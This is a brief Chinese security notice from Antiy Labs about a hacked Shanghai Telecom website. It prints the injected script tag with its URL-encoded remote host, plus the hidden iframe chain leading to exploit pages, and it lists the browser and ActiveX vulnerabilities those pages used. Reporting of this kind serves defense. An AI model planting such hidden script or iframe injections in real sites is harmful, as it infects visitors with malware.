上海电信遭遇黑客入侵被挂马

该网站问题代码：

<script language=javascript src=hxxp://%61%2E%6C%69%61%6F%37%37%34%39%2E%63%6F%6D/js.js></script>

hxxp://a.liao7749.com/js.js问题框架代码：

<iframe src=hxxp:////www.zddx.net//love//360.htm width=100 height=0><//iframe>

hxxp://www.zddx.net/love/360.htm问题框架代码：

<iframe src=x.htm width=100 height=1><//iframe>

hxxp://www.zddx.net/love/x.htm问题框架代码

经解密后，发现该挂马网页利用以下几个漏洞进行传播：

RealPlayer播放器IERPCtl.IERPCtl.1漏洞

Real Networks RealPlayer 'rmoc3260.dll' ActiveX控件内存破坏漏洞

MS06-014漏洞

联众世界GLIEDown2.dll Active控件多个缓冲区溢出漏洞

新浪DLoader Class ActiveX控件任意文件下载漏洞

MS08-041漏洞

暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞

超星阅读器4.0漏洞

UUSee网络电视2008漏洞

联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞

MS09-002漏洞

【资料来源：安天实验室】